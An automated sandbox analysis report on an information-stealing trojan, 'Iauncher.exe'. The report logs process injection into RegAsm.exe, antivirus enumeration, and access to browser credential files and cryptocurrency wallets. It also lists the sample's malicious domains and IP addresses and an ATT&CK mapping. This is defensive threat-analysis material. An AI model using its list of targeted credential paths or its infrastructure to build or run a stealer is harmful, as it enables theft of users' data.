                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F16C92 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00F16C92
                          Source: C:\Users\user\Desktop\Iauncher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 2.2.Iauncher.exe.f40030.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Iauncher.exe.f10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Iauncher.exe.f40030.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Iauncher.exe PID: 7404, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7452, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                          Source: Yara matchFile source: 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7452, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 2.2.Iauncher.exe.f40030.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Iauncher.exe.f10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Iauncher.exe.f40030.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Iauncher.exe PID: 7404, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7452, type: MEMORYSTR
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          1
                          Disable or Modify Tools
                          1
                          OS Credential Dumping
                          1
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          1
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                          Process Injection
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory2
                          File and Directory Discovery
                          Remote Desktop Protocol2
                          Data from Local System
                          11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
                          Obfuscated Files or Information
                          Security Account Manager134
                          System Information Discovery
                          SMB/Windows Admin SharesData from Network Shared Drive1
                          Non-Standard Port
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Install Root Certificate
                          NTDS1
                          Query Registry
                          Distributed Component Object ModelInput Capture2
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script13
                          Software Packing
                          LSA Secrets241
                          Security Software Discovery
                          SSHKeylogging13
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Timestomp
                          Cached Domain Credentials1
                          Process Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          DLL Side-Loading
                          DCSync241
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Masquerading
                          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt241
                          Virtualization/Sandbox Evasion
                          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                          Process Injection
                          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1434866 Sample: Iauncher.exe Startdate: 01/05/2024 Architecture: WINDOWS Score: 96 23 google.com 2->23 25 gitgo.org 2->25 27 antiloxss.usite.pro 2->27 45 Snort IDS alert for network traffic 2->45 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 6 other signatures 2->51 8 Iauncher.exe 15 6 2->8         started        signatures3 process4 dnsIp5 29 google.com 142.251.163.113 GOOGLEUS United States 8->29 31 antiloxss.usite.pro 193.109.246.100, 443, 49732, 49734 COMPUBYTE-ASRU Virgin Islands (BRITISH) 8->31 33 gitgo.org 104.21.44.179, 443, 49741 CLOUDFLARENETUS United States 8->33 21 C:\Users\user\AppData\...\Iauncher.exe, PE32 8->21 dropped 12 Iauncher.exe 1 8->12         started        file6 process7 signatures8 53 Machine Learning detection for dropped file 12->53 55 Writes to foreign memory regions 12->55 57 Allocates memory in foreign processes 12->57 59 Injects a PE file into a foreign processes 12->59 15 RegAsm.exe 6 24 12->15         started        19 conhost.exe 12->19         started        process9 dnsIp10 35 147.45.47.65, 47232, 49742 FREE-NET-ASFREEnetEU Russian Federation 15->35 37 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->37 39 Installs new ROOT certificates 15->39 41 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 15->41 43 2 other signatures 15->43 signatures11

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          Iauncher.exe24%ReversingLabsByteCode-MSIL.Trojan.Zilla
                          Iauncher.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe100%Joe Sandbox ML
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://www.carterandcone.coml0%URL Reputationsafe
                          http://www.typography.netD0%URL Reputationsafe
                          http://www.sandoll.co.kr0%URL Reputationsafe
                          http://ns.adp/1.0/g0%Avira URL Cloudsafe
                          https://gitgo.org/Iauncher.zipd0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                          https://gitgo.org0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id23ResponseD0%Avira URL Cloudsafe
                          https://www.siticoneframework.com/0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                          http://tempuri.org/0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                          http://gitgo.org0%Avira URL Cloudsafe
                          http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id24Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id1ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id5Response0%Avira URL Cloudsafe
                          http://tempuri.org/D0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id8Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id10Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id3ResponseD0%Avira URL Cloudsafe
                          http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id13Response0%Avira URL Cloudsafe
                          https://www.siticoneframework.com/pricing.htmlFSoftware0%Avira URL Cloudsafe
                          http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id22Response0%Avira URL Cloudsafe
                          http://antiloxss.usite.prod0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id18Response0%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          antiloxss.usite.pro
                          193.109.246.100
                          truefalse
                            high
                            google.com
                            142.251.163.113
                            truefalse
                              high
                              gitgo.org
                              104.21.44.179
                              truefalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txtfalse
                                  high
                                  https://antiloxss.usite.pro/STLprograms/NEW/hwid.txtfalse
                                    high
                                    https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtfalse
                                      high
                                      https://antiloxss.usite.pro/STLprograms/NEW/z-Closing.txtfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://gitgo.org/Iauncher.zipdIauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/ac/?q=RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/Entity/Id23ResponseDRegAsm.exe, 00000004.00000002.1979402537.000000000284F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://tempuri.org/Entity/Id12ResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://gitgo.orgIauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://tempuri.org/RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://tempuri.org/Entity/Id2ResponseRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.com/designersIauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://tempuri.org/Entity/Id21ResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.siticoneframework.com/Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://ns.adp/1.0/gRegAsm.exe, 00000004.00000002.1979253603.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.galapagosdesign.com/DPleaseIauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.zhongyicts.com.cnIauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameIauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtt-Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://gitgo.orgIauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/hwids.txtdIauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://api.ip.sb/ipIauncher.exe, Iauncher.exe, 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.ecosia.org/newtab/RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.carterandcone.comlIauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RenewRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
